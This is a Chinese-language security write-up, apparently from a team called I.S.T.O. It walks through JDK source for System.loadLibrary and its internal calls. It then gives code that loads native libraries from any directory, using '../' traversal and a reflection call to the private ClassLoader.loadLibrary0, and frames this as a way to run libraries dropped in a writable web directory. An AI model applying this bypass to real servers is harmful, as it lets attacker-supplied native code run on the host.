0day-java load dynamic library from any path(java加载任意目录库文件)

TEAM : I.S.T.O
AUTHOR : kj021320
转载需注明作者,未经作者同意,不得用于任何形式的商业活动

    通常我们采用JAVASE API的局限性太大！例如只提供TCP/UDP以上的协议封装 不能获取更多硬件设备信息,对不同系统的特性访问(如win的注册表)等
为了摆脱这些,SUN-JAVA提供了  类跟本地系统的另一种桥梁 JNI(java native interface)中文就是JAVA本地接口,在WIN系统上面就是采用DLL文件而*nix就是SO文件
而编写好特定的 DLL/SO 文件以后我们需要通过 System.loadLibrary 对文件进行加载 而且官方也是这样说 必须确保库文件的位置在类路径中，从而确保 JVM 可以访问该库文件
对 System.loadLibrary 方法进行审核后,发现没对路径进行过滤,可以加载任意目录的库文件~而对于JAVA-WEB安全来说,这个问题更有利用价值！
库文件不需要放在容器的类路径而加载,因为一般安全的网站,容器的类路径目录都是只读,只有WEB目录可写...

现在JAVA类路径在 f:/kj021320/jproject/ 下 而且有
kj021320.class #类 含有本地方法 有静态代码域
public static native String getISTO();
static{
 System.loadLibrary("../../../kj021320");
}

而我们在 跟目录 f:/ 下有
kj021320.dll #库文件 对kj021320.class 本地方法的实现
同样可以加载动态连接库

下面我们对它的JAVA源代码进行分析研究
首先是System类的 loadLibrary 静态方法发起的 跟踪以下代码

    public static void loadLibrary(String libname) {
 Runtime.getRuntime().loadLibrary0(getCallerClass(), libname);
    }

看此 是调用了 Runtime类的 loadLibrary0 方法~ 把 调用此方法的类名字以及 lib名字传进去,我们再往这个方法进行跟踪
Runtime类的
    synchronized void loadLibrary0(Class fromClass, String libname) {
 SecurityManager security = System.getSecurityManager();
 if (security != null) {
     security.checkLink(libname); //检查是否能调用这个库文件名字
 }
 /*
  重点来了~注意看下面的代码 他对路径进行过滤了！可惜！win系统中
  File.separatorChar 是 /  我们可以用 / 来跳回上一层目录 绕过他的验证
  那*nix 系统呢？ 不用急 我们继续往下面看

 */
 if (libname.indexOf((int)File.separatorChar) != -1) {
     throw new UnsatisfiedLinkError("Directory separator should not appear in library name: " + libname);
 }
 //这里又调用了ClassLoader 的loadLibrary方法 我们继续追踪进去
 ClassLoader.loadLibrary(fromClass, libname, false);
    }

ClassLoader类的
 //这里代码有点多
    static void loadLibrary(Class fromClass, String name,boolean isAbsolute) {
 //首先判断我们上面是否有传一个类进来~~  就是 到底是哪个类调用加载 库的方法 就把那个类传进去所以
 //fromClass 大多不会为null

        ClassLoader loader = (fromClass == null) ? null : fromClass.getClassLoader();
 //这里判断 系统的类库路径
        if (sys_paths == null) {
     usr_paths = initializePath("java.library.path");
     sys_paths = initializePath("sun.boot.library.path");
        }
 //判断路径是不是绝对的！要是绝对路径的就直接 new File() 看到了吗？没有对name再次过滤
 //汗~~ 又调用 loadLibrary0 这个方法！ 哎！嵌套还真多
        if (isAbsolute) {
     if (loadLibrary0(fromClass, new File(name))) {
         return;
     }
     throw new UnsatisfiedLinkError("Can't load library: " + name);
 }
 if (loader != null) {
     String libfilename = loader.findLibrary(name);
     if (libfilename != null) {
         File libfile = new File(libfilename);
         if (!libfile.isAbsolute()) {
      throw new UnsatisfiedLinkError("ClassLoader.findLibrary failed to return an absolute path: " + libfilename);
  }
  if (loadLibrary0(fromClass, libfile)) {
      return;
  }
  throw new UnsatisfiedLinkError("Can't load " + libfilename);
     }
 }
 //这里是循环遍历类路径  也调用了 loadLibrary0这个方法 我们得再次跟踪进去
 for (int i = 0 ; i < sys_paths.length ; i++) {
     File libfile = new File(sys_paths[i], System.mapLibraryName(name));
     if (loadLibrary0(fromClass, libfile)) {
         return;
     }
 }
 if (loader != null) {
     for (int i = 0 ; i < usr_paths.length ; i++) {
         File libfile = new File(usr_paths[i],System.mapLibraryName(name));
  if (loadLibrary0(fromClass, libfile)) {
      return;
  }
     }
 }
 // Oops, it failed
        throw new UnsatisfiedLinkError("no " + name + " in java.library.path");
    }

//看了以上的代码,很明显了！我们需要再去分析 loadLibrary0这个方法,代码更多了！看来更是重点

    private static boolean loadLibrary0(Class fromClass, final File file) {
 //判断文件是否存在 不存在就退出这个函数返回false
 Boolean exists = (Boolean)AccessController.doPrivileged(new PrivilegedAction() {public Object run() {return new Boolean(file.exists());}});
 if (!exists.booleanValue()) {
     return false;
 }
 //以下是获取文件的绝对路径
        String name;
 try {
     name = file.getCanonicalPath();
 } catch (IOException e) {
     return false;
 }
 //这句不分析了
        ClassLoader loader =(fromClass == null) ? null : fromClass.getClassLoader();
 //获取  系统本地库的集合
        Vector libs =loader != null ? loader.nativeLibraries : systemNativeLibraries;
 //下面这个同步操作是为了避免同一个库文件在多线程下 加载多次
 synchronized (libs) {
     int size = libs.size();
     for (int i = 0; i < size; i++) {
         NativeLibrary lib = (NativeLibrary)libs.elementAt(i);
  if (name.equals(lib.name)) {
      return true;
  }
     }
     synchronized (loadedLibraryNames) {
         if (loadedLibraryNames.contains(name)) {
      throw new UnsatisfiedLinkError("Native Library " + name + " already loaded in another classloader");
  }
  int n = nativeLibraryContext.size();
  for (int i = 0; i < n; i++) {
      NativeLibrary lib = (NativeLibrary)nativeLibraryContext.elementAt(i);
      if (name.equals(lib.name)) {
          if (loader == lib.fromClass.getClassLoader()) {
       return true;
   } else {
       throw new UnsatisfiedLinkError("Native Library "+name+" is being loaded in another classloader");
   }
      }
  }
  //实例化一个本地库
  NativeLibrary lib = new NativeLibrary(fromClass, name);
  nativeLibraryContext.push(lib);
  try {
  //**************正式加载操作 NativeLibrary的load方法实现***********
      lib.load(name);
  
  } finally {
      nativeLibraryContext.pop();
  }
  if (lib.handle != 0) {
      loadedLibraryNames.addElement(name);
      libs.addElement(lib);
      return true;
  }
  return false;
     }
 }
    }

以上 NativeLibrary 类是ClassLoader类的一个内部类 最终 load方法也是本地实现 具体是JVM内部的！
分析到这里很明显 最终我们可以调用loadLibrary0 这个方法来绕过前面一大堆的验证！OK 但是loadLibrary0 是个private方法
一般直接调用不了！对于熟悉JAVA的开发者来说！这个是小事！我们采用reflect 来破解 他的权限吧！

下面静态代码实现

static
{
 Method llm;
 try {
  //获取私有的方法 loadLibrary0
  llm = ClassLoader.class.getDeclaredMethod("loadLibrary0", new Class[]{Class.class,File.class});
  llm.setAccessible(true);//破解权限
  llm.invoke(null, new Object[]{你自己的类.class,new File("DLL的绝对路径 记得加后缀")});
  /*
  llm.invoke(null, new Object[]{ISTO.class,new File("/isto.so")});
  */
 } catch (Exception e) {
  e.printStackTrace();
 }
}
这样我们就可以在WEB目录上面放库文件 任意加载了

全文完